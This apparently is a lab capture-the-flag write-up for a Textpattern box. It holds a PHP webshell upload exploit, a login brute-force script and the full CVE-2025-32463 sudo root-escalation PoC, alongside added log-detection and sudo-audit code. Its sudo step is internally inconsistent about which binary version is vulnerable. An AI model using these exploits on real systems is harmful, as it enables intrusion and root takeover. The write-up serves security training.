mazesec 5ud0
Information Gathering
# Nmap 7.95 scan initiated Sun Dec 21 12:12:22 2025 as: /usr/lib/nmap/nmap -sC -sV -O -oN nmap_result.txt 192.168.110.165
Nmap scan report for 5ud0.lan (192.168.110.165)
Host is up (0.00061s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: My site
|_http-generator: Textpattern CMS
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:F2:F5:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 21 12:12:35 2025 -- 1 IP address (1 host up) scanned in 13.92 seconds
Vulnerability Analysis
A search shows that the Textpattern admin backend lives at example.com/textpattern.
➜ 5ud0 searchsploit textpattern
TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) | php/webapps/49996.txt
TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50415.txt
➜ 5ud0 searchsploit -m 49996.txt
➜ 5ud0 cat 49996.txt
# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
# Date : 2021/09/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software web : https://textpattern.com/
# Tested on: Server : Xampp
First of all we should use the file upload section to upload our shell.
Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>
1) Go to the content section.
2) Click Files and upload the malicious php file.
3) Go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
After uploading our file, our request and response are like below:
Request:
GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP; PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8
pc\mertdas
Exploitation analysis:
- Prerequisite (Authenticated): we must first log in to the backend.
- Upload point (Upload): after logging in, go to Content → Files.
- Payload: upload a PHP file containing <?PHP system($_GET['cmd']);?>.
- Trigger: request /textpattern/files/yourfile.php?cmd=whoami to execute the command.
Exploitation
After trying weak credentials without success, the password of the admin user was brute-forced with Python:
import requests
import sys

# ================= Configuration =================
# Target URL
url = "http://textpattern.dsz/textpattern/index.php"
# Username
username = "admin"
# Wordlist path (Kali default)
wordlist = "/usr/share/wordlists/rockyou.txt"
# String that marks a failed login
fail_string = "Could not log in"
# ===========================================

def brute_force():
    print(f"[*] Attacking target: {url}")
    print(f"[*] User: {username}")
    # Spoof the User-Agent to avoid being blocked
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    }
    try:
        with open(wordlist, "r", encoding="latin-1") as f:
            for password in f:
                password = password.strip()
                # A Session object handles cookies/PHPSESSID automatically
                s = requests.Session()
                # Build the payload; the event parameter is normally "login"
                data = {
                    "p_userid": username,
                    "p_password": password,
                    "_txp_token": "",   # the token was observed to be empty
                    "event": "login",   # the login action
                    "lang": "en"
                }
                try:
                    # Send the request
                    r = s.post(url, data=data, headers=headers, allow_redirects=True)
                    # Print progress (overwriting the same line)
                    sys.stdout.write(f"\r[-] Trying password: {password:<20}")
                    sys.stdout.flush()
                    # Success check: if the failure marker is absent from the page,
                    # the login probably succeeded
                    if fail_string not in r.text:
                        print(f"\n\n[+] Success! The password is: {password}")
                        return
                except Exception:
                    # Ignore transient network errors
                    continue
    except FileNotFoundError:
        print(f"\n[!] Error: wordlist not found: {wordlist}")
        sys.exit()

if __name__ == "__main__":
    brute_force()
This yields the credentials admin:superman.
After logging in, uploading the file gives a shell as the www-data user.
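Every failed attempt made by the script above comes back as HTTP 200 carrying the "Could not log in" marker, so status codes in Apache's access log do not reveal the attack; what does stand out is a burst of POST requests to /textpattern/index.php from a single client. The following detection example is added here and is not part of the original writeup: it parses combined-format access-log lines and flags any IP that POSTs to the login URL at least a threshold number of times inside a sliding time window. The log lines, IPs, timestamps and threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" format: ip ident user [time] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Textpattern posts its login form to this URL (assumed default install path)
LOGIN_PATH = "/textpattern/index.php"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def login_bursts(lines, path=LOGIN_PATH, window=timedelta(seconds=60), threshold=20):
    """Return {ip: peak_count} for every client that POSTed to `path`
    at least `threshold` times inside any sliding window of length `window`."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?")[0] == path:
            by_ip[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, stamps in by_ip.items():
        stamps.sort()
        peak, start = 0, 0
        for end in range(len(stamps)):
            # Slide the window start forward until it spans at most `window`
            while stamps[end] - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def sample_log():
    """Constructed sample traffic (not real logs): 25 rapid POSTs from 10.0.0.5,
    three spaced-out POSTs from 10.0.0.9, harmless GETs from 10.0.0.7, one bad line."""
    tz = timezone(timedelta(hours=8))
    t0 = datetime(2025, 12, 21, 12, 30, 0, tzinfo=tz)

    def line(ip, secs, method, path, status=200):
        ts = (t0 + timedelta(seconds=secs)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 5123 "-" "Mozilla/5.0"'

    lines = [line("10.0.0.5", 2 * i, "POST", LOGIN_PATH) for i in range(25)]
    lines += [line("10.0.0.9", s, "POST", LOGIN_PATH) for s in (0, 30, 600)]
    lines += [line("10.0.0.7", 3 * i, "GET", LOGIN_PATH + "?event=article") for i in range(40)]
    lines.append("this line is not in combined log format")
    return lines


if __name__ == "__main__":
    for ip, peak in login_bursts(sample_log()).items():
        print(f"[!] {ip}: {peak} login POSTs within 60 s")
```

Run it against a real file with `login_bursts(open("/var/log/apache2/access.log"))`; the GET traffic to the same URL is ignored on purpose, because only the POST carries the credentials. Tuning the threshold to the site's normal login rate and pairing the alert with rate limiting (or fail2ban) at the login URL is the usual mitigation.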
Privilege Escalation
www-data@5ud0:/tmp$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/local/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
Two sudo binaries were found:
/usr/local/bin/sudo --version → 1.9.6
/usr/bin/sudo --version → 1.9.16p2
which sudo → /usr/local/bin/sudo
Searching online turned up a vulnerability in 1.9.16p2, CVE-2025-32463:
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
    setreuid(0,0);
    setregid(0,0);
    chdir("/");
    execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
This is the original PoC; we need to change the line sudo -R woot woot to /usr/local/bin/sudo -R woot woot.
Then just run it.
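Because which sudo resolves to /usr/local/bin/sudo on this box, the binary a user actually invokes is simply the first one on PATH, and a hand-installed copy under /usr/local is never touched by apt. The audit script below is an added example, not part of the writeup or of the PoC: it enumerates every executable named sudo on PATH in lookup order, runs each with --version, and compares the parsed version against the range the CVE-2025-32463 advisory lists as affected (1.9.14 through 1.9.17, fixed in 1.9.17p1; the chroot option -R that the PoC relies on only exists from 1.9.14). The version strings and PATH values used in the checks are constructed.

```python
import os
import re
import subprocess

# Affected range per the CVE-2025-32463 advisory: sudo 1.9.14 up to and
# including 1.9.17; 1.9.17p1 is the first fixed release.
AFFECTED_FROM = (1, 9, 14, 0)
FIXED_IN = (1, 9, 17, 1)

# First line of `sudo --version` looks like "Sudo version 1.9.16p2"
VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(text):
    """Turn `sudo --version` output into a comparable tuple (major, minor, patch, p-level):
    '1.9.16p2' -> (1, 9, 16, 2), '1.9.6' -> (1, 9, 6, 0). Returns None if not found."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(g) if g is not None else 0 for g in m.groups())


def affected_by_cve_2025_32463(version):
    """True when the parsed version falls inside the affected range."""
    return version is not None and AFFECTED_FROM <= version < FIXED_IN


def sudo_binaries_on_path(path_env):
    """Every executable named 'sudo' on PATH, in lookup order (the first one wins)."""
    found = []
    for d in path_env.split(os.pathsep):
        cand = os.path.join(d, "sudo")
        if os.path.isfile(cand) and os.access(cand, os.X_OK) and cand not in found:
            found.append(cand)
    return found


def audit(path_env=None):
    """Run each sudo binary on PATH with --version; return [(path, version, affected)]."""
    if path_env is None:
        path_env = os.environ.get("PATH", "")
    report = []
    for binary in sudo_binaries_on_path(path_env):
        try:
            out = subprocess.run([binary, "--version"], capture_output=True,
                                 text=True, timeout=10).stdout
        except (OSError, subprocess.SubprocessError):
            out = ""
        ver = parse_sudo_version(out)
        report.append((binary, ver, affected_by_cve_2025_32463(ver)))
    return report


if __name__ == "__main__":
    for binary, ver, hit in audit():
        label = "AFFECTED" if hit else ("unknown version" if ver is None else "ok")
        print(f"{binary}: {ver} {label}")
```

The remediation the result points at is the same in either case: upgrade the packaged sudo to 1.9.17p1 or later, and remove any redundant setuid copy that the package manager does not own, since a second sudo earlier on PATH silently replaces the patched one.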
Lessons Learned
After getting in, a hash for the user todd was found in /etc/grub.d/40_custom:
➜ echo "grub.pbkdf2.sha512.10000.331CE43938E4B3E78E46FA5870701CF066644AE172308EA85401990390EF43ABCEA86EF085F010EABF28AAC613692A970FDE435B6AB36959FBF69E14F190BB17.F75B2CB6CDE13A8BBED7CD102E634216374FD9B5962C85FFB845954A98448E8D5DE5A5070B573D09043FDAFA92B8FC1BEDF59AA413EFD5000EB99B150C5FCC88" > todd_hash.txt
➜ hashcat -m 7200 todd_hash.txt /usr/share/wordlists/rockyou.txt
It could not be cracked.